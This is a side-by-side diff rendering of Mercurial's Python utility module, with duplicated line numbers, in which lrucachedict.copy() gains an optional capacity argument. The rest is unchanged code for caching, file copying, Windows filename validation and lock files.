
def acceptintervention(tr=None):

1186

"""A context manager that closes the transaction on InterventionRequired

1186

"""A context manager that closes the transaction on InterventionRequired

1187

1188

If no transaction was provided, this simply runs the body and returns

1188

If no transaction was provided, this simply runs the body and returns

1189

"""

1189

"""

1190

if not tr:

1190

if not tr:

1191

yield

1191

yield

1192

return

1192

return

1193

try:

1193

try:

1194

yield

1194

yield

1195

tr.close()

1195

tr.close()

1196

except error.InterventionRequired:

1196

except error.InterventionRequired:

1197

tr.close()

1197

tr.close()

1198

raise

1198

raise

1199

finally:

1199

finally:

1200

tr.release()

1200

tr.release()

1201

1202

@contextlib.contextmanager

1202

@contextlib.contextmanager

1203

def nullcontextmanager():

1203

def nullcontextmanager():

1204

yield

1204

yield

1205

1206

class _lrucachenode(object):

1206

class _lrucachenode(object):

1207

"""A node in a doubly linked list.

1207

"""A node in a doubly linked list.

1208

1209

Holds a reference to nodes on either side as well as a key-value

1209

Holds a reference to nodes on either side as well as a key-value

1210

pair for the dictionary entry.

1210

pair for the dictionary entry.

1211

"""

1211

"""

1212

__slots__ = (u'next', u'prev', u'key', u'value')

1212

__slots__ = (u'next', u'prev', u'key', u'value')

1213

1214

def __init__(self):

1214

def __init__(self):

1215

self.next = None

1215

self.next = None

1216

self.prev = None

1216

self.prev = None

1217

1218

self.key = _notset

1218

self.key = _notset

1219

self.value = None

1219

self.value = None

1220

1221

def markempty(self):

1221

def markempty(self):

1222

"""Mark the node as emptied."""

1222

"""Mark the node as emptied."""

1223

self.key = _notset

1223

self.key = _notset

1224

1225

class lrucachedict(object):

1225

class lrucachedict(object):

1226

"""Dict that caches most recent accesses and sets.

1226

"""Dict that caches most recent accesses and sets.

1227

1228

The dict consists of an actual backing dict - indexed by original

1228

The dict consists of an actual backing dict - indexed by original

1229

key - and a doubly linked circular list defining the order of entries in

1229

key - and a doubly linked circular list defining the order of entries in

1230

the cache.

1230

the cache.

1231

1232

The head node is the newest entry in the cache. If the cache is full,

1232

The head node is the newest entry in the cache. If the cache is full,

1233

we recycle head.prev and make it the new head. Cache accesses result in

1233

we recycle head.prev and make it the new head. Cache accesses result in

1234

the node being moved to before the existing head and being marked as the

1234

the node being moved to before the existing head and being marked as the

1235

new head node.

1235

new head node.

1236

"""

1236

"""

1237

def __init__(self, max):

1237

def __init__(self, max):

1238

self._cache = {}

1238

self._cache = {}

1239

1240

self._head = head = _lrucachenode()

1240

self._head = head = _lrucachenode()

1241

head.prev = head

1241

head.prev = head

1242

head.next = head

1242

head.next = head

1243

self._size = 1

1243

self._size = 1

1244

self.capacity = max

1244

self.capacity = max

1245

1246

def __len__(self):

1246

def __len__(self):

1247

return len(self._cache)

1247

return len(self._cache)

1248

1249

def __contains__(self, k):

1249

def __contains__(self, k):

1250

return k in self._cache

1250

return k in self._cache

1251

1252

def __iter__(self):

1252

def __iter__(self):

1253

# We don't have to iterate in cache order, but why not.

1253

# We don't have to iterate in cache order, but why not.

1254

n = self._head

1254

n = self._head

1255

for i in range(len(self._cache)):

1255

for i in range(len(self._cache)):

1256

yield n.key

1256

yield n.key

1257

n = n.next

1257

n = n.next

1258

1259

def __getitem__(self, k):

1259

def __getitem__(self, k):

1260

node = self._cache[k]

1260

node = self._cache[k]

1261

self._movetohead(node)

1261

self._movetohead(node)

1262

return node.value

1262

return node.value

1263

1264

def __setitem__(self, k, v):

1264

def __setitem__(self, k, v):

1265

node = self._cache.get(k)

1265

node = self._cache.get(k)

1266

# Replace existing value and mark as newest.

1266

# Replace existing value and mark as newest.

1267

if node is not None:

1267

if node is not None:

1268

node.value = v

1268

node.value = v

1269

self._movetohead(node)

1269

self._movetohead(node)

1270

return

1270

return

1271

1272

if self._size < self.capacity:

1272

if self._size < self.capacity:

1273

node = self._addcapacity()

1273

node = self._addcapacity()

1274

else:

1274

else:

1275

# Grab the last/oldest item.

1275

# Grab the last/oldest item.

1276

node = self._head.prev

1276

node = self._head.prev

1277

1278

# At capacity. Kill the old entry.

1278

# At capacity. Kill the old entry.

1279

if node.key is not _notset:

1279

if node.key is not _notset:

1280

del self._cache[node.key]

1280

del self._cache[node.key]

1281

1282

node.key = k

1282

node.key = k

1283

node.value = v

1283

node.value = v

1284

self._cache[k] = node

1284

self._cache[k] = node

1285

# And mark it as newest entry. No need to adjust order since it

1285

# And mark it as newest entry. No need to adjust order since it

1286

# is already self._head.prev.

1286

# is already self._head.prev.

1287

self._head = node

1287

self._head = node

1288

1289

def __delitem__(self, k):

1289

def __delitem__(self, k):

1290

node = self._cache.pop(k)

1290

node = self._cache.pop(k)

1291

node.markempty()

1291

node.markempty()

1292

1293

# Temporarily mark as newest item before re-adjusting head to make

1293

# Temporarily mark as newest item before re-adjusting head to make

1294

# this node the oldest item.

1294

# this node the oldest item.

1295

self._movetohead(node)

1295

self._movetohead(node)

1296

self._head = node.next

1296

self._head = node.next

1297

1298

# Additional dict methods.

1298

# Additional dict methods.

1299

1300

def get(self, k, default=None):

1300

def get(self, k, default=None):

1301

try:

1301

try:

1302

return self._cache[k].value

1302

return self._cache[k].value

1303

except KeyError:

1303

except KeyError:

1304

return default

1304

return default

1305

1306

def clear(self):

1306

def clear(self):

1307

n = self._head

1307

n = self._head

1308

while n.key is not _notset:

1308

while n.key is not _notset:

1309

n.markempty()

1309

n.markempty()

1310

n = n.next

1310

n = n.next

1311

1312

self._cache.clear()

1312

self._cache.clear()

1313

1314

def copy(self):

1314

def copy(self, capacity=None):

1315

result = lrucachedict(self.capacity)

1315

"""Create a new cache as a copy of the current one.

1316

1317

By default, the new cache has the same capacity as the existing one.

1318

But, the cache capacity can be changed as part of performing the

1319

copy.

1320

1321

Items in the copy have an insertion/access order matching this

1322

instance.

1323

"""

1324

1325

capacity = capacity or self.capacity

1326

result = lrucachedict(capacity)

1316

1327

1317

# We copy entries by iterating in oldest-to-newest order so the copy

1328

# We copy entries by iterating in oldest-to-newest order so the copy

1318

# has the correct ordering.

1329

# has the correct ordering.

1319

1330

1320

# Find the first non-empty entry.

1331

# Find the first non-empty entry.

1321

n = self._head.prev

1332

n = self._head.prev

1322

while n.key is _notset and n is not self._head:

1333

while n.key is _notset and n is not self._head:

1323

n = n.prev

1334

n = n.prev

1324

1335

1336

# We could potentially skip the first N items when decreasing capacity.

1337

# But let's keep it simple unless it is a performance problem.

1325

for i in range(len(self._cache)):

1338

for i in range(len(self._cache)):

1326

result[n.key] = n.value

1339

result[n.key] = n.value

1327

n = n.prev

1340

n = n.prev

1328

1341

1329

return result

1342

return result

1330

1343

1331

def _movetohead(self, node):

1344

def _movetohead(self, node):

1332

"""Mark a node as the newest, making it the new head.

1345

"""Mark a node as the newest, making it the new head.

1333

1346

1334

When a node is accessed, it becomes the freshest entry in the LRU

1347

When a node is accessed, it becomes the freshest entry in the LRU

1335

list, which is denoted by self._head.

1348

list, which is denoted by self._head.

1336

1349

1337

Visually, let's make ``N`` the new head node (* denotes head):

1350

Visually, let's make ``N`` the new head node (* denotes head):

1338

1351

1339

previous/oldest <-> head <-> next/next newest

1352

previous/oldest <-> head <-> next/next newest

1340

1353

1341

----<->--- A* ---<->-----

1354

----<->--- A* ---<->-----

1342

| |

1355

| |

1343

E <-> D <-> N <-> C <-> B

1356

E <-> D <-> N <-> C <-> B

1344

1357

1345

To:

1358

To:

1346

1359

1347

----<->--- N* ---<->-----

1360

----<->--- N* ---<->-----

1348

| |

1361

| |

1349

E <-> D <-> C <-> B <-> A

1362

E <-> D <-> C <-> B <-> A

1350

1363

1351

This requires the following moves:

1364

This requires the following moves:

1352

1365

1353

C.next = D (node.prev.next = node.next)

1366

C.next = D (node.prev.next = node.next)

1354

D.prev = C (node.next.prev = node.prev)

1367

D.prev = C (node.next.prev = node.prev)

1355

E.next = N (head.prev.next = node)

1368

E.next = N (head.prev.next = node)

1356

N.prev = E (node.prev = head.prev)

1369

N.prev = E (node.prev = head.prev)

1357

N.next = A (node.next = head)

1370

N.next = A (node.next = head)

1358

A.prev = N (head.prev = node)

1371

A.prev = N (head.prev = node)

1359

"""

1372

"""

1360

head = self._head

1373

head = self._head

1361

# C.next = D

1374

# C.next = D

1362

node.prev.next = node.next

1375

node.prev.next = node.next

1363

# D.prev = C

1376

# D.prev = C

1364

node.next.prev = node.prev

1377

node.next.prev = node.prev

1365

# N.prev = E

1378

# N.prev = E

1366

node.prev = head.prev

1379

node.prev = head.prev

1367

# N.next = A

1380

# N.next = A

1368

# It is tempting to do just "head" here, however if node is

1381

# It is tempting to do just "head" here, however if node is

1369

# adjacent to head, this will do bad things.

1382

# adjacent to head, this will do bad things.

1370

node.next = head.prev.next

1383

node.next = head.prev.next

1371

# E.next = N

1384

# E.next = N

1372

node.next.prev = node

1385

node.next.prev = node

1373

# A.prev = N

1386

# A.prev = N

1374

node.prev.next = node

1387

node.prev.next = node

1375

1388

1376

self._head = node

1389

self._head = node

1377

1390

1378

def _addcapacity(self):

1391

def _addcapacity(self):

1379

"""Add a node to the circular linked list.

1392

"""Add a node to the circular linked list.

1380

1393

1381

The new node is inserted before the head node.

1394

The new node is inserted before the head node.

1382

"""

1395

"""

1383

head = self._head

1396

head = self._head

1384

node = _lrucachenode()

1397

node = _lrucachenode()

1385

head.prev.next = node

1398

head.prev.next = node

1386

node.prev = head.prev

1399

node.prev = head.prev

1387

node.next = head

1400

node.next = head

1388

head.prev = node

1401

head.prev = node

1389

self._size += 1

1402

self._size += 1

1390

return node

1403

return node

1391

1404

1392

def lrucachefunc(func):

1405

def lrucachefunc(func):

1393

'''cache most recent results of function calls'''

1406

'''cache most recent results of function calls'''

1394

cache = {}

1407

cache = {}

1395

order = collections.deque()

1408

order = collections.deque()

1396

if func.__code__.co_argcount == 1:

1409

if func.__code__.co_argcount == 1:

1397

def f(arg):

1410

def f(arg):

1398

if arg not in cache:

1411

if arg not in cache:

1399

if len(cache) > 20:

1412

if len(cache) > 20:

1400

del cache[order.popleft()]

1413

del cache[order.popleft()]

1401

cache[arg] = func(arg)

1414

cache[arg] = func(arg)

1402

else:

1415

else:

1403

order.remove(arg)

1416

order.remove(arg)

1404

order.append(arg)

1417

order.append(arg)

1405

return cache[arg]

1418

return cache[arg]

1406

else:

1419

else:

1407

def f(*args):

1420

def f(*args):

1408

if args not in cache:

1421

if args not in cache:

1409

if len(cache) > 20:

1422

if len(cache) > 20:

1410

del cache[order.popleft()]

1423

del cache[order.popleft()]

1411

cache[args] = func(*args)

1424

cache[args] = func(*args)

1412

else:

1425

else:

1413

order.remove(args)

1426

order.remove(args)

1414

order.append(args)

1427

order.append(args)

1415

return cache[args]

1428

return cache[args]

1416

1429

1417

return f

1430

return f

1418

1431

1419

class propertycache(object):

1432

class propertycache(object):

1420

def __init__(self, func):

1433

def __init__(self, func):

1421

self.func = func

1434

self.func = func

1422

self.name = func.__name__

1435

self.name = func.__name__

1423

def __get__(self, obj, type=None):

1436

def __get__(self, obj, type=None):

1424

result = self.func(obj)

1437

result = self.func(obj)

1425

self.cachevalue(obj, result)

1438

self.cachevalue(obj, result)

1426

return result

1439

return result

1427

1440

1428

def cachevalue(self, obj, value):

1441

def cachevalue(self, obj, value):

1429

# __dict__ assignment required to bypass __setattr__ (eg: repoview)

1442

# __dict__ assignment required to bypass __setattr__ (eg: repoview)

1430

obj.__dict__[self.name] = value

1443

obj.__dict__[self.name] = value

1431

1444

1432

def clearcachedproperty(obj, prop):

1445

def clearcachedproperty(obj, prop):

1433

'''clear a cached property value, if one has been set'''

1446

'''clear a cached property value, if one has been set'''

1434

if prop in obj.__dict__:

1447

if prop in obj.__dict__:

1435

del obj.__dict__[prop]

1448

del obj.__dict__[prop]

1436

1449

1437

def increasingchunks(source, min=1024, max=65536):

1450

def increasingchunks(source, min=1024, max=65536):

1438

'''return no less than min bytes per chunk while data remains,

1451

'''return no less than min bytes per chunk while data remains,

1439

doubling min after each chunk until it reaches max'''

1452

doubling min after each chunk until it reaches max'''

1440

def log2(x):

1453

def log2(x):

1441

if not x:

1454

if not x:

1442

return 0

1455

return 0

1443

i = 0

1456

i = 0

1444

while x:

1457

while x:

1445

x >>= 1

1458

x >>= 1

1446

i += 1

1459

i += 1

1447

return i - 1

1460

return i - 1

1448

1461

1449

buf = []

1462

buf = []

1450

blen = 0

1463

blen = 0

1451

for chunk in source:

1464

for chunk in source:

1452

buf.append(chunk)

1465

buf.append(chunk)

1453

blen += len(chunk)

1466

blen += len(chunk)

1454

if blen >= min:

1467

if blen >= min:

1455

if min < max:

1468

if min < max:

1456

min = min << 1

1469

min = min << 1

1457

nmin = 1 << log2(blen)

1470

nmin = 1 << log2(blen)

1458

if nmin > min:

1471

if nmin > min:

1459

min = nmin

1472

min = nmin

1460

if min > max:

1473

if min > max:

1461

min = max

1474

min = max

1462

yield ''.join(buf)

1475

yield ''.join(buf)

1463

blen = 0

1476

blen = 0

1464

buf = []

1477

buf = []

1465

if buf:

1478

if buf:

1466

yield ''.join(buf)

1479

yield ''.join(buf)

1467

1480

1468

def always(fn):

1481

def always(fn):

1469

return True

1482

return True

1470

1483

1471

def never(fn):

1484

def never(fn):

1472

return False

1485

return False

1473

1486

1474

def nogc(func):

1487

def nogc(func):

1475

"""disable garbage collector

1488

"""disable garbage collector

1476

1489

1477

Python's garbage collector triggers a GC each time a certain number of

1490

Python's garbage collector triggers a GC each time a certain number of

1478

container objects (the number being defined by gc.get_threshold()) are

1491

container objects (the number being defined by gc.get_threshold()) are

1479

allocated even when marked not to be tracked by the collector. Tracking has

1492

allocated even when marked not to be tracked by the collector. Tracking has

1480

no effect on when GCs are triggered, only on what objects the GC looks

1493

no effect on when GCs are triggered, only on what objects the GC looks

1481

into. As a workaround, disable GC while building complex (huge)

1494

into. As a workaround, disable GC while building complex (huge)

1482

containers.

1495

containers.

1483

1496

1484

This garbage collector issue have been fixed in 2.7. But it still affect

1497

This garbage collector issue have been fixed in 2.7. But it still affect

1485

CPython's performance.

1498

CPython's performance.

1486

"""

1499

"""

1487

def wrapper(*args, **kwargs):

1500

def wrapper(*args, **kwargs):

1488

gcenabled = gc.isenabled()

1501

gcenabled = gc.isenabled()

1489

gc.disable()

1502

gc.disable()

1490

try:

1503

try:

1491

return func(*args, **kwargs)

1504

return func(*args, **kwargs)

1492

finally:

1505

finally:

1493

if gcenabled:

1506

if gcenabled:

1494

gc.enable()

1507

gc.enable()

1495

return wrapper

1508

return wrapper

1496

1509

1497

if pycompat.ispypy:

1510

if pycompat.ispypy:

1498

# PyPy runs slower with gc disabled

1511

# PyPy runs slower with gc disabled

1499

nogc = lambda x: x

1512

nogc = lambda x: x

1500

1513

1501

def pathto(root, n1, n2):

1514

def pathto(root, n1, n2):

1502

'''return the relative path from one place to another.

1515

'''return the relative path from one place to another.

1503

root should use os.sep to separate directories

1516

root should use os.sep to separate directories

1504

n1 should use os.sep to separate directories

1517

n1 should use os.sep to separate directories

1505

n2 should use "/" to separate directories

1518

n2 should use "/" to separate directories

1506

returns an os.sep-separated path.

1519

returns an os.sep-separated path.

1507

1520

1508

If n1 is a relative path, it's assumed it's

1521

If n1 is a relative path, it's assumed it's

1509

relative to root.

1522

relative to root.

1510

n2 should always be relative to root.

1523

n2 should always be relative to root.

1511

'''

1524

'''

1512

if not n1:

1525

if not n1:

1513

return localpath(n2)

1526

return localpath(n2)

1514

if os.path.isabs(n1):

1527

if os.path.isabs(n1):

1515

if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:

1528

if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:

1516

return os.path.join(root, localpath(n2))

1529

return os.path.join(root, localpath(n2))

1517

n2 = '/'.join((pconvert(root), n2))

1530

n2 = '/'.join((pconvert(root), n2))

1518

a, b = splitpath(n1), n2.split('/')

1531

a, b = splitpath(n1), n2.split('/')

1519

a.reverse()

1532

a.reverse()

1520

b.reverse()

1533

b.reverse()

1521

while a and b and a[-1] == b[-1]:

1534

while a and b and a[-1] == b[-1]:

1522

a.pop()

1535

a.pop()

1523

b.pop()

1536

b.pop()

1524

b.reverse()

1537

b.reverse()

1525

return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

1538

return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

1526

1539

1527

# the location of data files matching the source code

1540

# the location of data files matching the source code

1528

if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':

1541

if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':

1529

# executable version (py2exe) doesn't support __file__

1542

# executable version (py2exe) doesn't support __file__

1530

datapath = os.path.dirname(pycompat.sysexecutable)

1543

datapath = os.path.dirname(pycompat.sysexecutable)

1531

else:

1544

else:

1532

datapath = os.path.dirname(pycompat.fsencode(__file__))

1545

datapath = os.path.dirname(pycompat.fsencode(__file__))

1533

1546

1534

i18n.setdatapath(datapath)

1547

i18n.setdatapath(datapath)

1535

1548

1536

def checksignature(func):

1549

def checksignature(func):

1537

'''wrap a function with code to check for calling errors'''

1550

'''wrap a function with code to check for calling errors'''

1538

def check(*args, **kwargs):

1551

def check(*args, **kwargs):

1539

try:

1552

try:

1540

return func(*args, **kwargs)

1553

return func(*args, **kwargs)

1541

except TypeError:

1554

except TypeError:

1542

if len(traceback.extract_tb(sys.exc_info()[2])) == 1:

1555

if len(traceback.extract_tb(sys.exc_info()[2])) == 1:

1543

raise error.SignatureError

1556

raise error.SignatureError

1544

raise

1557

raise

1545

1558

1546

return check

1559

return check

1547

1560

1548

# a whilelist of known filesystems where hardlink works reliably

1561

# a whilelist of known filesystems where hardlink works reliably

1549

_hardlinkfswhitelist = {

1562

_hardlinkfswhitelist = {

1550

'apfs',

1563

'apfs',

1551

'btrfs',

1564

'btrfs',

1552

'ext2',

1565

'ext2',

1553

'ext3',

1566

'ext3',

1554

'ext4',

1567

'ext4',

1555

'hfs',

1568

'hfs',

1556

'jfs',

1569

'jfs',

1557

'NTFS',

1570

'NTFS',

1558

'reiserfs',

1571

'reiserfs',

1559

'tmpfs',

1572

'tmpfs',

1560

'ufs',

1573

'ufs',

1561

'xfs',

1574

'xfs',

1562

'zfs',

1575

'zfs',

1563

}

1576

}

1564

1577

1565

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):

1578

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):

1566

'''copy a file, preserving mode and optionally other stat info like

1579

'''copy a file, preserving mode and optionally other stat info like

1567

atime/mtime

1580

atime/mtime

1568

1581

1569

checkambig argument is used with filestat, and is useful only if

1582

checkambig argument is used with filestat, and is useful only if

1570

destination file is guarded by any lock (e.g. repo.lock or

1583

destination file is guarded by any lock (e.g. repo.lock or

1571

repo.wlock).

1584

repo.wlock).

1572

1585

1573

copystat and checkambig should be exclusive.

1586

copystat and checkambig should be exclusive.

1574

'''

1587

'''

1575

assert not (copystat and checkambig)

1588

assert not (copystat and checkambig)

1576

oldstat = None

1589

oldstat = None

1577

if os.path.lexists(dest):

1590

if os.path.lexists(dest):

1578

if checkambig:

1591

if checkambig:

1579

oldstat = checkambig and filestat.frompath(dest)

1592

oldstat = checkambig and filestat.frompath(dest)

1580

unlink(dest)

1593

unlink(dest)

1581

if hardlink:

1594

if hardlink:

1582

# Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks

1595

# Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks

1583

# unless we are confident that dest is on a whitelisted filesystem.

1596

# unless we are confident that dest is on a whitelisted filesystem.

1584

try:

1597

try:

1585

fstype = getfstype(os.path.dirname(dest))

1598

fstype = getfstype(os.path.dirname(dest))

1586

except OSError:

1599

except OSError:

1587

fstype = None

1600

fstype = None

1588

if fstype not in _hardlinkfswhitelist:

1601

if fstype not in _hardlinkfswhitelist:

1589

hardlink = False

1602

hardlink = False

1590

if hardlink:

1603

if hardlink:

1591

try:

1604

try:

1592

oslink(src, dest)

1605

oslink(src, dest)

1593

return

1606

return

1594

except (IOError, OSError):

1607

except (IOError, OSError):

1595

pass # fall back to normal copy

1608

pass # fall back to normal copy

1596

if os.path.islink(src):

1609

if os.path.islink(src):

1597

os.symlink(os.readlink(src), dest)

1610

os.symlink(os.readlink(src), dest)

1598

# copytime is ignored for symlinks, but in general copytime isn't needed

1611

# copytime is ignored for symlinks, but in general copytime isn't needed

1599

# for them anyway

1612

# for them anyway

1600

else:

1613

else:

1601

try:

1614

try:

1602

shutil.copyfile(src, dest)

1615

shutil.copyfile(src, dest)

1603

if copystat:

1616

if copystat:

1604

# copystat also copies mode

1617

# copystat also copies mode

1605

shutil.copystat(src, dest)

1618

shutil.copystat(src, dest)

1606

else:

1619

else:

1607

shutil.copymode(src, dest)

1620

shutil.copymode(src, dest)

1608

if oldstat and oldstat.stat:

1621

if oldstat and oldstat.stat:

1609

newstat = filestat.frompath(dest)

1622

newstat = filestat.frompath(dest)

1610

if newstat.isambig(oldstat):

1623

if newstat.isambig(oldstat):

1611

# stat of copied file is ambiguous to original one

1624

# stat of copied file is ambiguous to original one

1612

advanced = (

1625

advanced = (

1613

oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff

1626

oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff

1614

os.utime(dest, (advanced, advanced))

1627

os.utime(dest, (advanced, advanced))

1615

except shutil.Error as inst:

1628

except shutil.Error as inst:

1616

raise error.Abort(str(inst))

1629

raise error.Abort(str(inst))

1617

1630

1618

def copyfiles(src, dst, hardlink=None, progress=None):

1631

def copyfiles(src, dst, hardlink=None, progress=None):

1619

"""Copy a directory tree using hardlinks if possible."""

1632

"""Copy a directory tree using hardlinks if possible."""

1620

num = 0

1633

num = 0

1621

1634

1622

def settopic():

1635

def settopic():

1623

if progress:

1636

if progress:

1624

progress.topic = _('linking') if hardlink else _('copying')

1637

progress.topic = _('linking') if hardlink else _('copying')

1625

1638

1626

if os.path.isdir(src):

1639

if os.path.isdir(src):

1627

if hardlink is None:

1640

if hardlink is None:

1628

hardlink = (os.stat(src).st_dev ==

1641

hardlink = (os.stat(src).st_dev ==

1629

os.stat(os.path.dirname(dst)).st_dev)

1642

os.stat(os.path.dirname(dst)).st_dev)

1630

settopic()

1643

settopic()

1631

os.mkdir(dst)

1644

os.mkdir(dst)

1632

for name, kind in listdir(src):

1645

for name, kind in listdir(src):

1633

srcname = os.path.join(src, name)

1646

srcname = os.path.join(src, name)

1634

dstname = os.path.join(dst, name)

1647

dstname = os.path.join(dst, name)

1635

hardlink, n = copyfiles(srcname, dstname, hardlink, progress)

1648

hardlink, n = copyfiles(srcname, dstname, hardlink, progress)

1636

num += n

1649

num += n

1637

else:

1650

else:

1638

if hardlink is None:

1651

if hardlink is None:

1639

hardlink = (os.stat(os.path.dirname(src)).st_dev ==

1652

hardlink = (os.stat(os.path.dirname(src)).st_dev ==

1640

os.stat(os.path.dirname(dst)).st_dev)

1653

os.stat(os.path.dirname(dst)).st_dev)

1641

settopic()

1654

settopic()

1642

1655

1643

if hardlink:

1656

if hardlink:

1644

try:

1657

try:

1645

oslink(src, dst)

1658

oslink(src, dst)

1646

except (IOError, OSError):

1659

except (IOError, OSError):

1647

hardlink = False

1660

hardlink = False

1648

shutil.copy(src, dst)

1661

shutil.copy(src, dst)

1649

else:

1662

else:

1650

shutil.copy(src, dst)

1663

shutil.copy(src, dst)

1651

num += 1

1664

num += 1

1652

if progress:

1665

if progress:

1653

progress.increment()

1666

progress.increment()

1654

1667

1655

return hardlink, num

1668

return hardlink, num

1656

1669

1657

_winreservednames = {

1670

_winreservednames = {

1658

'con', 'prn', 'aux', 'nul',

1671

'con', 'prn', 'aux', 'nul',

1659

'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',

1672

'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',

1660

'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',

1673

'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',

1661

}

1674

}

1662

_winreservedchars = ':*?"<>|'

1675

_winreservedchars = ':*?"<>|'

1663

def checkwinfilename(path):

1676

def checkwinfilename(path):

1664

r'''Check that the base-relative path is a valid filename on Windows.

1677

r'''Check that the base-relative path is a valid filename on Windows.

1665

Returns None if the path is ok, or a UI string describing the problem.

1678

Returns None if the path is ok, or a UI string describing the problem.

1666

1679

1667

>>> checkwinfilename(b"just/a/normal/path")

1680

>>> checkwinfilename(b"just/a/normal/path")

1668

>>> checkwinfilename(b"foo/bar/con.xml")

1681

>>> checkwinfilename(b"foo/bar/con.xml")

1669

"filename contains 'con', which is reserved on Windows"

1682

"filename contains 'con', which is reserved on Windows"

1670

>>> checkwinfilename(b"foo/con.xml/bar")

1683

>>> checkwinfilename(b"foo/con.xml/bar")

1671

"filename contains 'con', which is reserved on Windows"

1684

"filename contains 'con', which is reserved on Windows"

1672

>>> checkwinfilename(b"foo/bar/xml.con")

1685

>>> checkwinfilename(b"foo/bar/xml.con")

1673

>>> checkwinfilename(b"foo/bar/AUX/bla.txt")

1686

>>> checkwinfilename(b"foo/bar/AUX/bla.txt")

1674

"filename contains 'AUX', which is reserved on Windows"

1687

"filename contains 'AUX', which is reserved on Windows"

1675

>>> checkwinfilename(b"foo/bar/bla:.txt")

1688

>>> checkwinfilename(b"foo/bar/bla:.txt")

1676

"filename contains ':', which is reserved on Windows"

1689

"filename contains ':', which is reserved on Windows"

1677

>>> checkwinfilename(b"foo/bar/b\07la.txt")

1690

>>> checkwinfilename(b"foo/bar/b\07la.txt")

1678

"filename contains '\\x07', which is invalid on Windows"

1691

"filename contains '\\x07', which is invalid on Windows"

1679

>>> checkwinfilename(b"foo/bar/bla ")

1692

>>> checkwinfilename(b"foo/bar/bla ")

1680

"filename ends with ' ', which is not allowed on Windows"

1693

"filename ends with ' ', which is not allowed on Windows"

1681

>>> checkwinfilename(b"../bar")

1694

>>> checkwinfilename(b"../bar")

1682

>>> checkwinfilename(b"foo\\")

1695

>>> checkwinfilename(b"foo\\")

1683

"filename ends with '\\', which is invalid on Windows"

1696

"filename ends with '\\', which is invalid on Windows"

1684

>>> checkwinfilename(b"foo\\/bar")

1697

>>> checkwinfilename(b"foo\\/bar")

1685

"directory name ends with '\\', which is invalid on Windows"

1698

"directory name ends with '\\', which is invalid on Windows"

1686

'''

1699

'''

1687

if path.endswith('\\'):

1700

if path.endswith('\\'):

1688

return _("filename ends with '\\', which is invalid on Windows")

1701

return _("filename ends with '\\', which is invalid on Windows")

1689

if '\\/' in path:

1702

if '\\/' in path:

1690

return _("directory name ends with '\\', which is invalid on Windows")

1703

return _("directory name ends with '\\', which is invalid on Windows")

1691

for n in path.replace('\\', '/').split('/'):

1704

for n in path.replace('\\', '/').split('/'):

1692

if not n:

1705

if not n:

1693

continue

1706

continue

1694

for c in _filenamebytestr(n):

1707

for c in _filenamebytestr(n):

1695

if c in _winreservedchars:

1708

if c in _winreservedchars:

1696

return _("filename contains '%s', which is reserved "

1709

return _("filename contains '%s', which is reserved "

1697

"on Windows") % c

1710

"on Windows") % c

1698

if ord(c) <= 31:

1711

if ord(c) <= 31:

1699

return _("filename contains '%s', which is invalid "

1712

return _("filename contains '%s', which is invalid "

1700

"on Windows") % stringutil.escapestr(c)

1713

"on Windows") % stringutil.escapestr(c)

1701

base = n.split('.')[0]

1714

base = n.split('.')[0]

1702

if base and base.lower() in _winreservednames:

1715

if base and base.lower() in _winreservednames:

1703

return _("filename contains '%s', which is reserved "

1716

return _("filename contains '%s', which is reserved "

1704

"on Windows") % base

1717

"on Windows") % base

1705

t = n[-1:]

1718

t = n[-1:]

1706

if t in '. ' and n not in '..':

1719

if t in '. ' and n not in '..':

1707

return _("filename ends with '%s', which is not allowed "

1720

return _("filename ends with '%s', which is not allowed "

1708

"on Windows") % t

1721

"on Windows") % t

1709

1722

1710

if pycompat.iswindows:

1723

if pycompat.iswindows:

1711

checkosfilename = checkwinfilename

1724

checkosfilename = checkwinfilename

1712

timer = time.clock

1725

timer = time.clock

1713

else:

1726

else:

1714

checkosfilename = platform.checkosfilename

1727

checkosfilename = platform.checkosfilename

1715

timer = time.time

1728

timer = time.time

1716

1729

1717

if safehasattr(time, "perf_counter"):

1730

if safehasattr(time, "perf_counter"):

1718

timer = time.perf_counter

1731

timer = time.perf_counter

1719

1732

1720

def makelock(info, pathname):

1733

def makelock(info, pathname):

1721

"""Create a lock file atomically if possible

1734

"""Create a lock file atomically if possible

1722

1735

1723

This may leave a stale lock file if symlink isn't supported and signal

1736

This may leave a stale lock file if symlink isn't supported and signal

1724

interrupt is enabled.

1737

interrupt is enabled.

1725

"""

1738

"""

1726

try:

1739

try:

1727

return os.symlink(info, pathname)

1740

return os.symlink(info, pathname)

1728

except OSError as why:

1741

except OSError as why:

1729

if why.errno == errno.EEXIST:

1742

if why.errno == errno.EEXIST:

1730

raise

1743

raise

1731

except AttributeError: # no symlink in os

1744

except AttributeError: # no symlink in os

1732

pass

1745

pass

1733

1746

1734

flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)

1747

flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)

1735

ld = os.open(pathname, flags)

1748

ld = os.open(pathname, flags)

1736

os.write(ld, info)

1749

os.write(ld, info)

1737

os.close(ld)

1750

os.close(ld)

1738

1751

1739

def readlock(pathname):

1752

def readlock(pathname):

1740

try:

1753

try:

1741

return os.readlink(pathname)

1754

return os.readlink(pathname)

1742

except OSError as why:

1755

except OSError as why:

1743

if why.errno not in (errno.EINVAL, errno.ENOSYS):

1756

if why.errno not in (errno.EINVAL, errno.ENOSYS):

1744

raise

1757

raise

1745

except AttributeError: # no symlink in os

1758

except AttributeError: # no symlink in os

1746

pass

1759

pass

1747

